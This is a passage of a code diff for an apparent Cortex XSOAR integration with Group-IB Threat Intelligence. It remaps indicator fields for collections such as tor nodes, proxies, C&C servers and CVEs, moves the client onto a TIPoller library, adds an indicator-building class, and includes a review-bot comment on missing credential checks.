"gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "indicators_date_first_seen": "firstseenbysource", + "indicators_date_last_seen": "lastseenbysource", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + "malware_list_names": "gibmalwarename", + }, + "indicators_params_domain": { + "id": "gibid", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "indicators_date_first_seen": "firstseenbysource", + "indicators_date_last_seen": "lastseenbysource", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + 
"evaluation_severity": "gibseverity", + "malware_list_names": "gibmalwarename", + }, + "indicators_params_url": { + "id": "gibid", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "indicators_date_first_seen": "firstseenbysource", + "indicators_date_last_seen": "lastseenbysource", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + "malware_list_names": "gibmalwarename", + }, + "indicators_params_hashes_md5": { + "id": "gibid", + "indicators_params_name": "gibfilename", + "indicators_params_hashes_md5": "md5", + "indicators_params_hashes_sha1": "sha1", + "indicators_params_hashes_sha256": "sha256", + "indicators_params_size": "size", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "indicators_date_first_seen": "firstseenbysource", + "indicators_date_last_seen": "lastseenbysource", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + "malware_list_names": "gibmalwarename", + }, + }, + "parser_mapping": { + "id": "id", + "indicators_params_ipv4": "indicators.params.ipv4", + "indicators_params_domain": "indicators.params.domain", + "indicators_params_url": "indicators.params.url", + "indicators_params_hashes_md5": "indicators.params.hashes.md5", + "threat_actor_name": "threatActor.name", + "threat_actor_is_apt": "threatActor.isAPT", + "threat_actor_id": "threatActor.id", + "indicators_date_first_seen": "indicators.dateFirstSeen", + "indicators_date_last_seen": "indicators.dateLastSeen", + "evaluation_reliability": "evaluation.reliability", + "evaluation_credibility": "evaluation.credibility", + "evaluation_admiralty_code": 
"evaluation.admiraltyCode", + "evaluation_severity": "evaluation.severity", + "indicators_params_name": "indicators.params.name", + "indicators_params_hashes_sha1": "indicators.params.hashes.sha1", + "indicators_params_hashes_sha256": "indicators.params.hashes.sha256", + "indicators_params_size": "indicators.params.size", + "malware_list_names": "malwareList.name", + }, }, "suspicious_ip/tor_node": { - 'indicators': - [ - { - "main_field": 'ipv4.ip', "main_field_type": 'IP', - "add_fields": [ - 'ipv4.asn', 'ipv4.countryName', 'ipv4.region', - 'dateFirstSeen', 'dateLastSeen', *EVALUATION_FIELDS - ], - "add_fields_types": [ - *IP_COMMON_FIELD_TYPES, 'firstseenbysource', 'lastseenbysource', *EVALUATION_FIELD_TYPES - ] - } - ] + "types": { + "ipv4_ip": "IP", + }, + "add_fields_types": { + "ipv4_ip": { + "id": "gibid", + "ipv4_asn": "asn", + "ipv4_country_mame": "geocountry", + "ipv4_region": "geolocation", + "date_first_seen": "firstseenbysource", + "date_last_seen": "lastseenbysource", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + } + }, + "parser_mapping": { + "id": "id", + "ipv4_ip": "ipv4.ip", + "ipv4_asn": "ipv4.asn", + "ipv4_country_mame": "ipv4.countryName", + "ipv4_region": "ipv4.region", + "date_first_seen": "dateFirstSeen", + "date_last_seen": "dateLastSeen", + "evaluation_reliability": "evaluation.reliability", + "evaluation_credibility": "evaluation.credibility", + "evaluation_admiralty_code": "evaluation.admiraltyCode", + "evaluation_severity": "evaluation.severity", + }, }, "suspicious_ip/open_proxy": { - 'indicators': - [ - { - "main_field": 'ipv4.ip', "main_field_type": 'IP', - "add_fields": [ - 'ipv4.asn', 'ipv4.countryName', 'ipv4.region', 'port', 'anonymous', 'source', - 'dateFirstSeen', 'dateDetected', *EVALUATION_FIELDS - ], - "add_fields_types": [ - *IP_COMMON_FIELD_TYPES, 'gibproxyport', 'gibproxyanonymous', 
'source', - 'firstseenbysource', 'lastseenbysource', *EVALUATION_FIELD_TYPES - ] - } - ] + "types": { + "ipv4_ip": "IP", + }, + "add_fields_types": { + "ipv4_ip": { + "id": "gibid", + "ipv4_asn": "asn", + "ipv4_country_mame": "geocountry", + "ipv4_region": "geolocation", + "port": "gibproxyport", + "anonymous": "gibproxyanonymous", + "source": "source", + "date_first_seen": "firstseenbysource", + "date_detected": "lastseenbysource", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + } + }, + "parser_mapping": { + "id": "id", + "ipv4_ip": "ipv4.ip", + "ipv4_asn": "ipv4.asn", + "ipv4_country_mame": "ipv4.countryName", + "ipv4_region": "ipv4.region", + "port": "port", + "anonymous": "anonymous", + "source": "source", + "date_first_seen": "dateFirstSeen", + "date_detected": "dateDetected", + "evaluation_reliability": "evaluation.reliability", + "evaluation_credibility": "evaluation.credibility", + "evaluation_admiralty_code": "evaluation.admiraltyCode", + "evaluation_severity": "evaluation.severity", + }, }, "suspicious_ip/socks_proxy": { - 'indicators': - [ - { - "main_field": 'ipv4.ip', "main_field_type": 'IP', - "add_fields": [ - 'ipv4.asn', 'ipv4.countryName', 'ipv4.region', 'dateFirstSeen', - 'dateLastSeen', *EVALUATION_FIELDS - ], - "add_fields_types": [ - *IP_COMMON_FIELD_TYPES, 'firstseenbysource', 'lastseenbysource', *EVALUATION_FIELD_TYPES - ] - } - ] + "types": { + "ipv4_ip": "IP", + }, + "add_fields_types": { + "ipv4_ip": { + "id": "gibid", + "ipv4_asn": "asn", + "ipv4_country_mame": "geocountry", + "ipv4_region": "geolocation", + "date_first_seen": "firstseenbysource", + "date_last_seen": "lastseenbysource", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + } + }, + "parser_mapping": { + 
"id": "id", + "ipv4_ip": "ipv4.ip", + "ipv4_asn": "ipv4.asn", + "ipv4_country_mame": "ipv4.countryName", + "ipv4_region": "ipv4.region", + "date_first_seen": "dateFirstSeen", + "date_last_seen": "dateLastSeen", + "evaluation_reliability": "evaluation.reliability", + "evaluation_credibility": "evaluation.credibility", + "evaluation_admiralty_code": "evaluation.admiraltyCode", + "evaluation_severity": "evaluation.severity", + }, + }, + "suspicious_ip/vpn": { + "types": { + "ipv4_ip": "IP", + }, + "add_fields_types": { + "ipv4_ip": { + "id": "gibid", + "ipv4_asn": "asn", + "ipv4_country_mame": "geocountry", + "ipv4_region": "geolocation", + "date_first_seen": "firstseenbysource", + "date_last_seen": "lastseenbysource", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + } + }, + "parser_mapping": { + "id": "id", + "date_first_seen": "dateFirstSeen", + "date_last_seen": "dateLastSeen", + "ipv4_ip": "ipv4.ip", + "ipv4_asn": "ipv4.asn", + "ipv4_country_mame": "ipv4.countryName", + "ipv4_region": "ipv4.region", + "evaluation_reliability": "evaluation.reliability", + "evaluation_credibility": "evaluation.credibility", + "evaluation_admiralty_code": "evaluation.admiraltyCode", + "evaluation_severity": "evaluation.severity", + }, + }, + "suspicious_ip/scanner": { + "types": { + "ipv4_ip": "IP", + }, + "add_fields_types": { + "ipv4_ip": { + "id": "gibid", + "ipv4_asn": "asn", + "ipv4_countr_mame": "geocountry", + "ipv4_region": "geolocation", + }, + }, + "parser_mapping": { + "id": "id", + "ipv4_ip": "ipv4.ip", + "ipv4_asn": "ipv4.asn", + "ipv4_country_name": "ipv4.countryName", + "ipv4_region": "ipv4.region", + }, }, "malware/cnc": { - 'indicators': - [ - { - 'main_field': 'url', "main_field_type": 'URL', - "add_fields": [ - *THREAT_ACTOR_FIELDS, 'dateDetected', 'dateLastSeen' - ], - "add_fields_types": [ - *THREAT_ACTOR_FIELD_TYPES, 
'firstseenbysource', 'lastseenbysource' - ] - }, - { - 'main_field': 'domain', "main_field_type": 'Domain', - "add_fields": [ - *THREAT_ACTOR_FIELDS, 'dateDetected', 'dateLastSeen' - ], - "add_fields_types": [ - *THREAT_ACTOR_FIELD_TYPES, 'firstseenbysource', 'lastseenbysource' - ] - }, - { - "main_field": 'ipv4.ip', "main_field_type": 'IP', - "add_fields": [ - 'ipv4.asn', 'ipv4.countryName', 'ipv4.region', - *THREAT_ACTOR_FIELDS, 'dateDetected', 'dateLastSeen' - ], - "add_fields_types": [ - *IP_COMMON_FIELD_TYPES, *THREAT_ACTOR_FIELD_TYPES, 'firstseenbysource', 'lastseenbysource' - ] - } - ] + "types": { + "url": "URL", + "domain": "Domain", + "ipv4_ip": "IP", + }, + "add_fields_types": { + "url": { + "id": "gibid", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "date_detected": "firstseenbysource", + "date_last_seen": "lastseenbysource", + "malware_list_names": "gibmalwarename", + }, + "domain": { + "id": "gibid", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "date_detected": "firstseenbysource", + "date_last_seen": "lastseenbysource", + "malware_list_names": "gibmalwarename", + }, + "ipv4_ip": { + "id": "gibid", + "ipv4_asn": "asn", + "ipv4_country_mame": "geocountry", + "ipv4_region": "geolocation", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "date_detected": "firstseenbysource", + "date_last_seen": "lastseenbysource", + "malware_list_names": "gibmalwarename", + }, + }, + "parser_mapping": { + "id": "id", + "url": "url", + "domain": "domain", + "ipv4_ip": "ipv4.ip", + "ipv4_asn": "ipv4.asn", + "ipv4_country_mame": "ipv4.countryName", + "ipv4_region": "ipv4.region", + "threat_actor_name": "threatActor.name", + "threat_actor_is_apt": "threatActor.isAPT", + "threat_actor_id": "threatActor.id", + 
"date_detected": "dateDetected", + "date_last_seen": "dateLastSeen", + "malware_list_names": "malwareList.name", + }, }, "osi/vulnerability": { - 'indicators': - [ - { - 'main_field': 'id', "main_field_type": 'CVE', - "add_fields": [ - 'cvss.score', 'cvss.vector', 'softwareMixed', - 'description', 'dateModified', 'datePublished', *EVALUATION_FIELDS - ], - "add_fields_types": [ - 'cvss', 'gibcvssvector', 'gibsoftwaremixed', - 'cvedescription', 'cvemodified', 'published', *EVALUATION_FIELD_TYPES - ] - } - ] + "types": { + "id": "CVE", + }, + "add_fields_types": { + "id": { + "id": "gibid", + "cvss_score": "cvss", + "cvss_vector": "gibcvssvector", + "software_mixed": "gibsoftwaremixed", + "description": "cvedescription", + "date_modified": "cvemodified", + "date_published": "published", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + } + }, + "markdowns": { + "software_mixed": ( + "| Software Name | Software Type | Software Version |\n" + "| ------------- | ------------- | ---------------- |\n" + ) + }, + "parser_mapping": { + "id": "id", + "cvss_score": "cvss.score", + "cvss_vector": "cvss.vector", + "software_mixed": { + "names": "softwareMixed.softwareName", + "types": "softwareMixed.softwareType", + "versions": "softwareMixed.softwareVersion", + }, + "description": "description", + "date_modified": "dateModified", + "date_published": "datePublished", + "evaluation_reliability": "evaluation.reliability", + "evaluation_credibility": "evaluation.credibility", + "evaluation_admiralty_code": "evaluation.admiraltyCode", + "evaluation_severity": "evaluation.severity", + }, + }, + "osi/git_repository": { + "types": { + "contributors_emails": "Email", + "hash": "GIB Hash", + }, + "add_fields_types": { + "contributors_emails": { + "id": "gibid", + }, + "hash": { + "id": "gibid", + }, + }, + "parser_mapping": { + "id": "id", + "hash": 
"files.revisions.hash", + "contributors_emails": "contributors.authorEmail", + }, + }, + "ioc/common": { + "types": { + "url": "URL", + "domain": "Domain", + "ip": "IP", + }, + "add_fields_types": { + "url": { + "id": "gibid", + "date_first_seen": "firstseenbysource", + "date_last_seen": "lastseenbysource", + }, + "domain": { + "id": "gibid", + "date_first_seen": "firstseenbysource", + "date_last_seen": "lastseenbysource", + }, + "ip": { + "id": "gibid", + "date_first_seen": "firstseenbysource", + "date_last_seen": "lastseenbysource", + }, + }, + "parser_mapping": { + "id": "id", + "url": "url", + "domain": "domain", + "ip": "ip", + "date_first_seen": "dateFirstSeen", + "date_last_seen": "dateLastSeen", + }, }, - 'ioc/common': { - 'indicators': - [ - { - 'main_field': 'url', "main_field_type": 'URL', - "add_fields": [ - 'dateFirstSeen', 'dateLastSeen', - - ], - "add_fields_types": [ - 'firstseenbysource', 'lastseenbysource', - - ] - }, - { - 'main_field': 'domain', "main_field_type": 'Domain', - "add_fields": [ - 'dateFirstSeen', 'dateLastSeen', - - ], - "add_fields_types": [ - 'firstseenbysource', 'lastseenbysource', - - ] - }, { - 'main_field': 'ip', "main_field_type": 'IP', - "add_fields": [ - 'dateFirstSeen', 'dateLastSeen', - - ], - "add_fields_types": [ - 'firstseenbysource', 'lastseenbysource', - - ] - } - ] - } } +COLLECTIONS_THAT_ARE_REQUIRED_HUNTING_RULES = [ + "osi/git_repository", + "osi/public_leak", + "compromised/breached", +] + class Client(BaseClient): """ 
@@ -483,92 +856,43 @@ class Client(BaseClient):
 Should only do requests and return data.
 """
- def create_update_generator(self, collection_name: str, date_from: str | None = None,
- seq_update: int | str | None = None, limit: int = 200) -> Generator:
- """
- Creates generator of lists with feeds class objects for an update session
- (feeds are sorted in ascending order) `collection_name` with set parameters.
-
- `seq_update` allows you to receive all relevant feeds. Such a request uses the seq_update parameter,
- you will receive a portion of feeds that starts with the next `seq_update` parameter for the current collection.
- For all feeds in the Group IB Intelligence continuous numbering is carried out.
- For example, the `seq_update` equal to 1999998 can be in the `compromised/accounts` collection,
- and a feed with seq_update equal to 1999999 can be in the `attacks/ddos` collection.
- If item updates (for example, if new attacks were associated with existing APT by our specialists
- or tor node has been detected as active again), the item gets a new parameter and it automatically rises
- in the database and "becomes relevant" again.
-
- :param collection_name: collection to update.
- :param date_from: start date of update session.
- :param seq_update: identification number from which to start the session.
- :param limit: size of portion in iteration.
- """
-
- while True:
- session = requests.Session()
- session.auth = HTTPBasicAuth(self._auth[0], self._auth[1])
-
- session.headers["Accept"] = "*/*"
- session.headers["User-Agent"] = f'SOAR/CortexSOAR/{self._auth[0]}/unknown'
-
- params = {'df': date_from, 'limit': limit, 'seqUpdate': seq_update}
- params = {key: value for key, value in params.items() if value}
- portion = session.get(url=f'{self._base_url}{collection_name}/updated', params=params, timeout=60).json()
-
- # product = f'SOAR/CortexSOAR/Username/unkown}'
- # portion = self._http_request(method="GET", url_suffix=collection_name + '/updated',
- # params=params, timeout=60.,
- # retries=4, status_list_to_retry=[429, 500])
- if portion.get("count") == 0:
- break
- seq_update = portion.get("seqUpdate")
- date_from = None
- yield portion.get('items')
-
- def create_search_generator(self, collection_name: str, date_from: str = None,
- limit: int = 200) -> Generator:
- """
- Creates generator of lists with feeds for the search session
- (feeds are sorted in descending order) for `collection_name` with set parameters.
-
- :param collection_name: collection to search.
- :param date_from: start date of search session.
- :param limit: size of portion in iteration.
- """
-
- result_id = None
- while True:
- session = requests.Session()
- session.auth = HTTPBasicAuth(self._auth[0], self._auth[1])
-
- session.headers["Accept"] = "*/*"
- session.headers["User-Agent"] = f'SOAR/CortexSOAR/{self._auth[0]}/unknown'
-
- params = {'df': date_from, 'limit': limit, 'resultId': result_id}
- params = {key: value for key, value in params.items() if value}
- portion = session.get(url=f'{self._base_url}{collection_name}', params=params, timeout=60).json()
- # params = {'df': date_from, 'limit': limit, 'resultId': result_id}
- # params = {key: value for key, value in params.items() if value}
- # portion = self._http_request(method="GET", url_suffix=collection_name,
- # params=params, timeout=60.,
- # retries=4, status_list_to_retry=[429, 500])
- if len(portion.get('items')) == 0:
- break
- result_id = portion.get("resultId")
- date_from = None
- yield portion.get('items')
-
- def search_feed_by_id(self, collection_name: str, feed_id: str) -> dict:
- """
- Searches for feed with `feed_id` in collection with `collection_name`.
-
- :param collection_name: in what collection to search.
- :param feed_id: id of feed to search.
- """
-
- portion = self._http_request(method="GET", url_suffix=collection_name + '/' + feed_id, timeout=60.,
- retries=4, status_list_to_retry=[429, 500])
- return portion
+ def __init__(self, base_url, verify=True, proxy=False, headers=None, auth=None):
+ super().__init__(
+ base_url=base_url, verify=verify, proxy=proxy, headers=headers, auth=auth
+ )
+
+ self._auth: tuple[str, str]
+ self.poller = TIPoller(
+ username=self._auth[0],
+ api_key=self._auth[1],
+ api_url=base_url,
+ )
+ self.poller.set_product(
+ product_type="SOAR",
+ product_name="CortexSOAR",
+ product_version="unknown",
+ integration_name="Group-IB Threat Intelligence",
+ integration_version="2.0.0",
+ )
+
+ def create_update_generator_proxy_functions(
+ self,
+ collection_name: str,
+ date_from: str | None = None,
+ sequpdate: int | str | None = None,
+ apply_hunting_rules: int | str | None = None,
+ limit: int | str | None = None,
+ ):
+ return self.poller.create_update_generator(
+ collection_name=collection_name,
+ date_from=date_from,
+ sequpdate=sequpdate,
+ apply_hunting_rules=apply_hunting_rules,
+ limit=limit,
+ )
+
+ def get_available_collections_proxy_function(self) -> list:
+ return self.poller.get_available_collections()
 def test_module(client: Client) -> str:
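Review bot: `__init__` subscripts `self._auth[0]` and `self._auth[1]` straight after the bare annotation `self._auth: tuple[str, str]`, yet `auth` defaults to `None`, so a Client built without credentials fails with a TypeError on the subscript instead of a clear configuration error; a guard such as `if not auth: raise ValueError("username and API key are required")` before the TIPoller call would make that explicit. `verify` and `proxy` are handed to `BaseClient` but not to `TIPoller(...)`, so the instance's TLS-verification and proxy settings do not visibly reach the poller that now performs every request — worth confirming against TIPoller's constructor and forwarding them if it accepts them. The two proxy methods carry no docstrings; a one-liner per method, e.g. `"""Return the poller's update generator for collection_name (see TIPoller.create_update_generator)."""`, plus a return annotation on `create_update_generator_proxy_functions` would match the documented methods this hunk removes. The enclosing `class Client` begins outside this hunk.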
@@ -578,190 +902,375 @@ def test_module(client: Client) -> str: :param client: GIB_TI&A_Feed client :return: 'ok' if test passed, anything else will fail the test. """ - - generator = client.create_update_generator(collection_name='compromised/mule', limit=10) - generator.__next__() - return 'ok' + test = client.get_available_collections_proxy_function() + if len(test) == 0: + return "There are no collections available" + return "ok" """ Support functions """ -def find_element_by_key(obj, key): - """ - Recursively finds element or elements in dict. - """ - - path = key.split(".", 1) - if len(path) == 1: - if isinstance(obj, list): - return [i.get(path[0]) for i in obj] - elif isinstance(obj, dict): - return obj.get(path[0]) - else: - return obj - else: - if isinstance(obj, list): - return [find_element_by_key(i.get(path[0]), path[1]) for i in obj] - elif isinstance(obj, dict): - return find_element_by_key(obj.get(path[0]), path[1]) +class IndicatorBuilding: + fields_list_for_parse = [ + "creationdate", + "firstseenbysource", + "lastseenbysource", + "gibdatecompromised", + ] + + def __init__( + self, + parsed_json: list[dict], + collection_name: str, + common_fields: dict, + collection_mapping: dict, + limit: int | None = None, + build_for_comand: bool = False, + ) -> None: + self.parsed_json = parsed_json + self.collection_name = collection_name + self.common_fields = common_fields + self.tags = common_fields.pop("tags", []) + self.limit = limit + self.collection_mapping = collection_mapping + self.build_for_comand = build_for_comand + + @staticmethod + def clean_data(data): + def clean_list(lst): + """Removes None, empty rows and empty lists from a list and unpacks nested lists.""" + cleaned = [] + for item in lst: + if isinstance(item, list): + cleaned.extend(clean_list(item)) + elif item not in (None, "", []): + cleaned.append(item) + return cleaned + + cleaned_data = [] + + for item in data: + cleaned_item = {} + for key, value in item.items(): + if 
isinstance(value, list): + cleaned_item[key] = clean_list(value) + else: + cleaned_item[key] = value + cleaned_data.append(cleaned_item) + + return cleaned_data + + @staticmethod + def invert_dict(data_dict: dict): + return {v: k for k, v in data_dict.items()} + + @staticmethod + def get_key_by_value(data_dict: dict, target_value: str): + inverted_dict = IndicatorBuilding.invert_dict(data_dict) + return inverted_dict.get(target_value) + + @staticmethod + def get_human_readable_feed( + indicators: list, type_: str, collection_name: str + ) -> str: + + headers = ["value", "type"] + + collection_data = COMMON_MAPPING.get(collection_name) + initial_type = IndicatorBuilding.get_key_by_value(collection_data["types"], type_) # type: ignore + additional_headers = collection_data["add_fields_types"].get(initial_type) # type: ignore + headers.extend(additional_headers.values()) + + return tableToMarkdown( + f"{type_} indicators", indicators, removeNull=True, headers=headers + ) + + @staticmethod + def transform_list_to_str(data: list[dict]) -> list[dict]: + def process_item(item): + if isinstance(item, dict): + for key, value in item.items(): + if isinstance(value, list): + item[key] = ", ".join(str(process_item(v)) for v in value) + else: + item[key] = process_item(value) + return item + + return [process_item(item) for item in data] + + @staticmethod + def sorting_indicators( + indicators: list[dict[str, Any]] + ) -> dict[str, list[dict[str, Any]]]: + sorted_indicators: dict[str, list[dict[str, Any]]] = {} + + for indicator in indicators: + raw_json = indicator.get("rawJSON", {}) + indicator_type = raw_json.get("type") + + if indicator_type == "CVE": + raw_json.pop("gibsoftwaremixed", None) + + sorted_indicators.setdefault(indicator_type, []).append(raw_json) + + return sorted_indicators + + def build_indicator_value_for_software_mixed(self, feed: dict) -> str: + markdowns = self.collection_mapping.get("markdowns", {}) + software_mixed_data = feed.get("software_mixed", {}) 
+ + rows = markdowns.get("software_mixed", "") + num_rows = len(next(iter(software_mixed_data.values()))) + + if num_rows > 0: + for i in range(num_rows): + row = ( + " | " + + " | ".join( + software_mixed_data[key][i] for key in software_mixed_data + ) + + " \n" + ) + rows += row + + software_mixed = rows else: - return obj + software_mixed = "" + indicator_value = software_mixed + return indicator_value -def unpack_iocs_from_list(ioc): - # type: (Union[list, str]) -> list - """ - Recursively unpacks all IOCs in one list. - """ - unpacked = [] - if isinstance(ioc, list): - for i in ioc: - unpacked.extend(unpack_iocs_from_list(i)) - else: - unpacked.append(ioc) + def build_indicator_value_for_date_field( + self, feed: dict, indicator_type_name: str + ): + indicator_value = dateparser.parse(feed.get(indicator_type_name)) # type: ignore + if indicator_value is not None: + indicator_value = indicator_value.strftime(DATE_FORMAT) # type: ignore + return indicator_value - return list(unpacked) + def extract_single_value(self, value): + """ + Extracts a single non-empty value from a potentially nested list. + :param value: The value to process, which could be a single value or a list of values. + :return: A single non-empty value or None if no valid value exists. + """ + if isinstance(value, list): + for item in value: + # Recursively extract a value from nested lists + result = self.extract_single_value(item) + if result is not None and result != "": + return result + return None + else: + return value if value is not None and value != "" else None -def unpack_iocs(iocs, ioc_type, fields, fields_names, collection_name): - """ - Recursively ties together and transforms indicator data. 
- """ - unpacked = [] - if isinstance(iocs, list): - for i, ioc in enumerate(iocs): - buf_fields = [] - for field in fields: - if isinstance(field, list): - buf_fields.append(field[i]) - else: - buf_fields.append(field) - unpacked.extend(unpack_iocs(ioc, ioc_type, buf_fields, fields_names, collection_name)) + def find_iocs_in_feed(self, feed: dict) -> list: + """ + Finds IOCs in the feed and transforms them to the appropriate format to ingest them into Demisto. - else: - if iocs in ['255.255.255.255', '0.0.0.0', '', None]: - return unpacked - - # fields=unpack_iocs_from_list(fields) - fields_dict = {fields_names[i]: fields[i] for i in range(len(fields_names)) if fields[i] is not None} - - # Transforming one certain field into a markdown table - if ioc_type == "CVE" and len(fields_dict["gibsoftwaremixed"]) != 0: - soft_mixed = fields_dict.get("gibsoftwaremixed", {}) - buffer = '' - for chunk in soft_mixed: - software_name = ', '.join(chunk.get('softwareName')) - software_type = ', '.join(chunk.get('softwareType')) - software_version = ', '.join(chunk.get('softwareVersion')) - if len(software_name) != 0 or len(software_type) != 0 or len(software_version) != 0: - buffer += '| {} | {} | {} |\n'.format(software_name, software_type, - software_version.replace('||', ', ')) - if len(buffer) != 0: - buffer = "| Software Name | Software Type | Software Version |\n" \ - "| ------------- | ------------- | ---------------- |\n" + buffer - fields_dict["gibsoftwaremixed"] = buffer + :param feed: feed from GIB TI&A. 
+ """ + indicators_types = self.collection_mapping.get("types", {}) + indicators_add_fields_types = self.collection_mapping.get( + "add_fields_types", {} + ) + + indicators = [] + + demisto.debug( + f"Starting to process find_iocs_in_feed feed: {feed}, collection: {self.collection_name}" + ) + + for indicator_type_name, indicator_type in indicators_types.items(): + add_fields = {} + demisto.debug( + f"Processing find_iocs_in_feed indicator type: {indicator_type_name}, corresponding type: {indicator_type}" + ) + + if indicator_type in self.fields_list_for_parse: + indicator_value = self.build_indicator_value_for_date_field( + feed=feed, indicator_type_name=indicator_type_name + ) + demisto.debug( + f"Extracted date field find_iocs_in_feed indicator value: {indicator_value}" + ) else: - del fields_dict["gibsoftwaremixed"] - - # Transforming into correct date format - for date_field in DATE_FIELDS_LIST: - if fields_dict.get(date_field): - previous_date = dateparser.parse(fields_dict.get(date_field, "")) - # previous_date = fields_dict.get(date_field, "") - - if previous_date: - fields_dict[date_field] = previous_date.strftime('%Y-%m-%dT%H:%M:%SZ') - # fields_dict[date_field] = convert_to_timestamp(previous_date) - fields_dict.update({'gibcollection': collection_name}) - - raw_json = {'value': iocs, 'type': ioc_type, **fields_dict} - unpacked.append({'value': iocs, 'type': ioc_type, 'rawJSON': raw_json, 'fields': fields_dict}) - - return unpacked + if indicator_type_name == "software_mixed": + indicator_value = self.build_indicator_value_for_software_mixed( + feed=feed + ) + demisto.debug( + f"Extracted software mixed find_iocs_in_feed indicator value: {indicator_value}" + ) + + elif indicator_type_name in indicators_add_fields_types: + # Retrieve the initial indicator value + indicator_value = feed.get(indicator_type_name) + demisto.debug( + f"Raw find_iocs_in_feed indicator value for {indicator_type_name}: {indicator_value}" + ) + + # If the value is a list, flatten 
it to get a single non-list value + indicator_value = self.extract_single_value(indicator_value) + demisto.debug( + f"Flattened find_iocs_in_feed indicator value: {indicator_value}" + ) + + # Now process additional fields + for ( + additional_field_name, + additional_field_type, + ) in indicators_add_fields_types.get( + indicator_type_name + ).items(): # noqa: E501 + additional_field_value = feed.get(additional_field_name) + + # Process additional_field_value similarly + additional_field_value = self.extract_single_value( + additional_field_value + ) + + demisto.debug( + f"Processed find_iocs_in_feed additional field '{additional_field_name}': {additional_field_value}" + ) + + # Only add to add_fields if additional_field_value is not None or empty + if ( + additional_field_value is not None + and additional_field_value != "" + ): + add_fields[additional_field_type] = additional_field_value + demisto.debug( + f"Added additional field find_iocs_in_feed '{additional_field_type}': {additional_field_value}" + ) + + add_fields.update( + { + "trafficlightprotocol": self.common_fields.get( + "trafficlightprotocol" + ), + "gibcollection": self.collection_name, + } + ) + demisto.debug( + f"Updated find_iocs_in_feed additional fields: {add_fields}" + ) + + # Create the raw JSON object + if indicator_value is not None and indicator_value != "": + raw_json = { + "value": indicator_value, + "type": indicator_type, + **add_fields, + } + if self.tags: + add_fields.update({"tags": self.tags}) + raw_json.update({"tags": self.tags}) + + indicators.append( + { + "value": indicator_value, + "type": indicator_type, + "rawJSON": raw_json, + "fields": add_fields, + } + ) + demisto.debug( + f"Added indicator find_iocs_in_feed: {indicator_value} of type: {indicator_type}" + ) + + demisto.debug(f"Final list of find_iocs_in_feed indicators: {indicators}") + + indicators = IndicatorBuilding.transform_list_to_str(indicators) + return indicators + + def get_indicators(self) -> list: + indicators 
= [] + results = [] + for feed in self.parsed_json: + indicators.extend(self.find_iocs_in_feed(feed)) + if (self.limit is not None) and len(indicators) >= self.limit: + indicators = indicators[: self.limit] + break + indicators = IndicatorBuilding.clean_data(indicators) + + if self.build_for_comand: + sorted_indicators = IndicatorBuilding.sorting_indicators(indicators) + + for type_, indicator in sorted_indicators.items(): + results.append( + CommandResults( + readable_output=IndicatorBuilding.get_human_readable_feed( + indicator, type_, self.collection_name + ), + raw_response=self.parsed_json, + ignore_auto_extract=True, + ) + ) + + return results if self.build_for_comand is True else indicators + + +class DateHelper: + + @staticmethod + def handle_first_time_fetch(last_run, collection_name, first_fetch_time): + last_fetch = last_run.get("last_fetch", {}).get(collection_name) + + # Handle first time fetch + date_from = None + seq_update = None + if not last_fetch: + date_from_for_mypy = dateparser.parse(first_fetch_time) + if date_from_for_mypy is None: + raise DemistoException( + "Inappropriate indicators_first_fetch format, " + "please use something like this: 2020-01-01 or January 1 2020 or 3 days." + f"It's now been received: {date_from}" + ) + date_from = date_from_for_mypy.strftime("%Y-%m-%d") + else: + seq_update = last_fetch -def find_iocs_in_feed(feed: dict, collection_name: str, common_fields: dict) -> list: - """ - Finds IOCs in the feed and transform them to the appropriate format to ingest them into Demisto. + return date_from, seq_update - :param feed: feed from GIB TI&A. - :param collection_name: which collection this feed belongs to. - :param common_fields: fields defined by user. 
